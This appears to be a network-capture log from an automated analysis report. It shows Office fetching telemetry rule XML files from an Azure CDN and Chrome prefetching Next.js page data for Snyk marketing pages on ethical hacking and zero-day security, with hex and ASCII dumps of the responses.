                                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:12 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                                              Content-Length: 472
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                                                                                                                              ETag: "0x8DC582B9DACDF62"
                                                                                                                                                                                                                                                                                                              x-ms-request-id: 1cb97257-a01e-0070-50f3-24573b000000
                                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                              x-azure-ref: 20241024T194912Z-15b8d89586frzkk2umu6w8qnt80000000es000000000ftd0
                                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              110192.168.2.54987123.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC639OUTGET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/series/ethical-hacking.json?slug=ethical-hacking HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              purpose: prefetch
                                                                                                                                                                                                                                                                                                              x-nextjs-data: 1
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              x-middleware-prefetch: 1
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: user_utm={}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:13 UTC631INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                              ETag: W/"145mex9e84l1hc6"
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/series/[...slug].json
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: STALE
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: arn1::iad1::9gvlp-1729799353007-85e457c9dcba
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:13 GMT
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799352.1f613ef
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:13 UTC15753INData Raw: 30 30 30 30 43 30 30 30 0d 0a 7b 22 70 61 67 65 50 72 6f 70 73 22 3a 7b 22 70 61 67 65 22 3a 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 37 61 5a 74 6c 72 63 34 65 43 4d 59 6e 39 72 42 38 78 46 6a 74 69 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 33 2d 30 36 2d 30 32 54 31 30 3a 33 35 3a 30 37 2e 38 33 37 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 31 30 2d 31 30 54
                                                                                                                                                                                                                                                                                                              Data Ascii: 0000C000{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"7aZtlrc4eCMYn9rB8xFjti","type":"Entry","createdAt":"2023-06-02T10:35:07.837Z","updatedAt":"2024-10-10T
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:13 UTC15979INData Raw: 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 5d 2c 22 76 61 6c 75 65 22 3a 22 55 6e 63 6f 76 65 72 20 65 6e 74 72 79 20 70 6f 69 6e 74 73 20 69 6e 20 66 69 72 65 77 61 6c 6c 73 2c 20 69 6e 74 72 75 73 69 6f 6e 20 64 65 74 65 63 74 69 6f 6e 20 73 79 73 74 65 6d 73 2c 20 61 6e 64 20 68 6f 6e 65 79 70 6f 74 73 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 70 61 72 61 67 72 61 70 68 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 6c 69 73 74 2d 69 74 65 6d 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d
                                                                                                                                                                                                                                                                                                              Data Ascii: {"data":{},"content":[{"data":{},"content":[{"data":{},"marks":[],"value":"Uncover entry points in firewalls, intrusion detection systems, and honeypots","nodeType":"text"}],"nodeType":"paragraph"}],"nodeType":"list-item"},{"data":{},"content":[{"data":{}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:13 UTC16384INData Raw: 20 6c 65 61 72 6e 20 6e 65 77 20 73 6b 69 6c 6c 73 20 61 6e 64 20 6b 65 65 70 20 75 70 20 77 69 74 68 20 74 68 65 20 6c 61 74 65 73 74 20 64 65 76 65 6c 6f 70 6d 65 6e 74 73 20 69 6e 20 74 68 65 20 66 69 65 6c 64 2e 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 70 61 72 61 67 72 61 70 68 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 6c 69 73 74 2d 69 74 65 6d 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 75 6e 6f 72 64 65 72 65 64 2d 6c 69 73 74 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 5d 2c 22 76 61 6c 75 65 22 3a 22 45 74 68 69 63 61 6c 20 68 61 63 6b 69 6e 67 20 72 65 73 6f 75 72 63 65 73 20 66 72 6f
                                                                                                                                                                                                                                                                                                              Data Ascii: learn new skills and keep up with the latest developments in the field.","nodeType":"text"}],"nodeType":"paragraph"}],"nodeType":"list-item"}],"nodeType":"unordered-list"},{"data":{},"content":[{"data":{},"marks":[],"value":"Ethical hacking resources fro
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:13 UTC1048INData Raw: 67 61 74 69 6f 6e 49 74 65 6d 22 2c 22 6c 61 62 65 6c 22 3a 22 52 65 73 6f 75 72 63 65 20 6c 69 62 72 61 72 79 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 75 72 6c 22 3a 22 2f 72 65 73 6f 75 72 63 65 2d 6c 69 62 72 61 72 79 2f 22 2c 22 61 70 70 65 61 72 61 6e 63 65 22 3a 7b 22 6e 61 76 49 74 65 6d 22 3a 7b 22 69 63 6f 6e 22 3a 22 6c 69 62 72 61 72 79 22 7d 7d 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 33 7a 32 57 70 47 4e 55 42 62 71 48 50 39 5a 43 74 50 4b 30 38 73 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 43 6f 6e 74 65 6e 74 4e 61 76 69 67 61 74 69 6f 6e 49 74 65 6d 22 2c 22 6c 61 62 65 6c 22 3a 22 43 75 73 74 6f 6d 65 72 20 72 65 73 6f 75 72 63 65 73 22 2c 22
                                                                                                                                                                                                                                                                                                              Data Ascii: gationItem","label":"Resource library","description":null,"url":"/resource-library/","appearance":{"navItem":{"icon":"library"}}},{"sys":{"id":"3z2WpGNUBbqHP9ZCtPK08s","__typename":"Sys"},"__typename":"ContentNavigationItem","label":"Customer resources","
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:13 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 44 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6c 75 6d 6e 52 6f 77 22 2c 22 6c 61 62 65 6c 22 3a 6e 75 6c 6c 2c 22 73 70 6f 74 6c 69 67 68 74 46 69 72 73 74 49 74 65 6d 22 3a 66 61 6c 73 65 2c 22 74 69 74 6c 65 54 65 78 74 22 3a 6e 75 6c 6c 2c 22 73 75 62 6d 65 6e 75 4c 69 6e 6b 73 22 3a 7b 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 44 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6c 75 6d 6e 52 6f 77 49 74 65 6d 73 43 6f 6c 6c 65 63 74 69 6f 6e 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 36 63 71 54 73 36 41 33 73 4c 32 52 33 54 38 4b 33 52 79 72 43 35 22 2c 22 5f
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000ename":"Sys"},"__typename":"NavigationDropdownMenuColumnRow","label":null,"spotlightFirstItem":false,"titleText":null,"submenuLinks":{"__typename":"NavigationDropdownMenuColumnRowItemsCollection","items":[{"sys":{"id":"6cqTs6A3sL2R3T8K3RyrC5","_
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:13 UTC12INData Raw: 66 6f 6f 74 65 72 4e 61 76 49 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: footerNavI
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:13 UTC3639INData Raw: 30 30 30 30 30 45 32 42 0d 0a 74 65 6d 73 22 3a 7b 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 46 6f 6f 74 65 72 43 61 74 65 67 6f 72 79 49 74 65 6d 73 43 6f 6c 6c 65 63 74 69 6f 6e 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 34 4b 69 77 30 32 4b 78 5a 76 35 55 41 6b 57 78 45 65 56 57 56 4a 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 43 6f 6e 74 65 6e 74 4e 61 76 69 67 61 74 69 6f 6e 49 74 65 6d 22 2c 22 6c 61 62 65 6c 22 3a 22 53 6e 79 6b 20 57 69 74 68 20 47 69 74 48 75 62 22 2c 22 75 72 6c 22 3a 22 2f 63 6f 6d 70 61 72 69 73 6f 6e 2f 67 69 74 68 75 62 2d 61 6e 64 2d 73 6e 79 6b 2f 22 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22
                                                                                                                                                                                                                                                                                                              Data Ascii: 00000E2Btems":{"__typename":"NavigationFooterCategoryItemsCollection","items":[{"sys":{"id":"4Kiw02KxZv5UAkWxEeVWVJ","__typename":"Sys"},"__typename":"ContentNavigationItem","label":"Snyk With GitHub","url":"/comparison/github-and-snyk/"},{"sys":{"id":"
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:13 UTC12INData Raw: 30 30 30 30 30 30 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 00000000


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                              111192.168.2.54987013.107.246.60443
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:13 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:13 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:13 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                                              Content-Length: 419
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                                                                                                                                                                                                              ETag: "0x8DC582B9748630E"
                                                                                                                                                                                                                                                                                                              x-ms-request-id: b26f0bb8-d01e-00ad-3518-26e942000000
                                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                              x-azure-ref: 20241024T194913Z-16849878b78bkvbz1ry47zvsas000000088g000000003r37
                                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:13 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                              112192.168.2.54987913.107.246.60443
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:13 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:13 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:13 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                                              Content-Length: 468
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                                                                                                                              ETag: "0x8DC582B9C8E04C8"
                                                                                                                                                                                                                                                                                                              x-ms-request-id: 00f7314e-e01e-0052-48ac-21d9df000000
                                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                              x-azure-ref: 20241024T194913Z-16849878b786vsxz21496wc2qn00000008bg000000000dak
                                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:13 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              113192.168.2.54987323.45.111.1604434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:13 UTC489OUTGET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/solutions/zero-day-vulnerability-security.json?slug=solutions&slug=zero-day-vulnerability-security HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: user_utm={}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:13 UTC655INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                              ETag: W/"yrdwmzfrjk47jq"
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/solutions/zero-day-vulnerability-security.json
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: STALE
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::iad1::swkkr-1729799353586-b8af2df62fa9
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:13 GMT
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.42284317.1729799353.1095a8f
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:13 UTC15729INData Raw: 30 30 30 30 36 30 30 30 0d 0a 7b 22 70 61 67 65 50 72 6f 70 73 22 3a 7b 22 70 61 67 65 22 3a 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 33 42 4a 6f 74 71 58 54 69 6c 4e 7a 6f 58 47 50 5a 73 4f 35 67 30 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 33 2d 31 30 2d 31 30 54 32 33 3a 32 32 3a 30 37 2e 34 36 32 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 37 2d 31 38 54
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"3BJotqXTilNzoXGPZsO5g0","type":"Entry","createdAt":"2023-10-10T23:22:07.462Z","updatedAt":"2024-07-18T
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:13 UTC8859INData Raw: 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 43 6f 6e 74 65 6e 74 54 79 70 65 22 2c 22 69 64 22 3a 22 61 74 6f 6d 42 75 74 74 6f 6e 22 7d 7d 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 55 53 22 7d 2c 22 66 69 65 6c 64 73 22 3a 7b 22 69 6e 74 65 72 6e 61 6c 4e 61 6d 65 22 3a 22 5c 22 45 78 70 6c 6f 72 65 20 6f 75 72 20 43 75 73 74 6f 6d 65 72 20 56 61 6c 75 65 20 53 74 75 64 79 5c 22 20 2d 20 74 65 72 74 69 61 72 79 20 22 2c 22 6c 61 62 65 6c 22 3a 22 52 65 61 64 20 74 68 65 20 43 75 73 74 6f 6d 65 72 20 56 61 6c 75 65 20 53 74 75 64 79 22 2c 22 75 72 6c 22 3a 22 2f 72 65 70 6f 72 74 73 2f 63 75 73 74 6f 6d 65 72 2d 76 61 6c 75 65 2d 73 74 75 64 79 22 2c 22 61 70 70 65 61 72 61 6e 63 65 22 3a 7b 22 62 75 74 74 6f 6e 22 3a 7b 22
                                                                                                                                                                                                                                                                                                              Data Ascii: type":"Link","linkType":"ContentType","id":"atomButton"}},"locale":"en-US"},"fields":{"internalName":"\"Explore our Customer Value Study\" - tertiary ","label":"Read the Customer Value Study","url":"/reports/customer-value-study","appearance":{"button":{"
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:13 UTC16384INData Raw: 30 30 30 30 36 30 30 30 0d 0a 30 32 33 2d 31 30 2d 31 30 54 32 33 3a 32 32 3a 30 38 2e 39 36 30 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 37 2d 31 38 54 32 31 3a 33 34 3a 30 36 2e 31 33 30 5a 22 2c 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 6d 61 73 74 65 72 22 2c 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 7d 7d 2c 22 70 75 62 6c 69 73 68 65 64 56 65 72 73 69 6f 6e 22 3a 31 33 2c 22 72 65 76 69 73 69 6f 6e 22 3a 33 2c 22 63 6f 6e 74 65 6e 74 54 79 70 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 43 6f 6e 74 65 6e 74 54 79 70 65 22 2c 22 69 64 22 3a 22 6d 6f
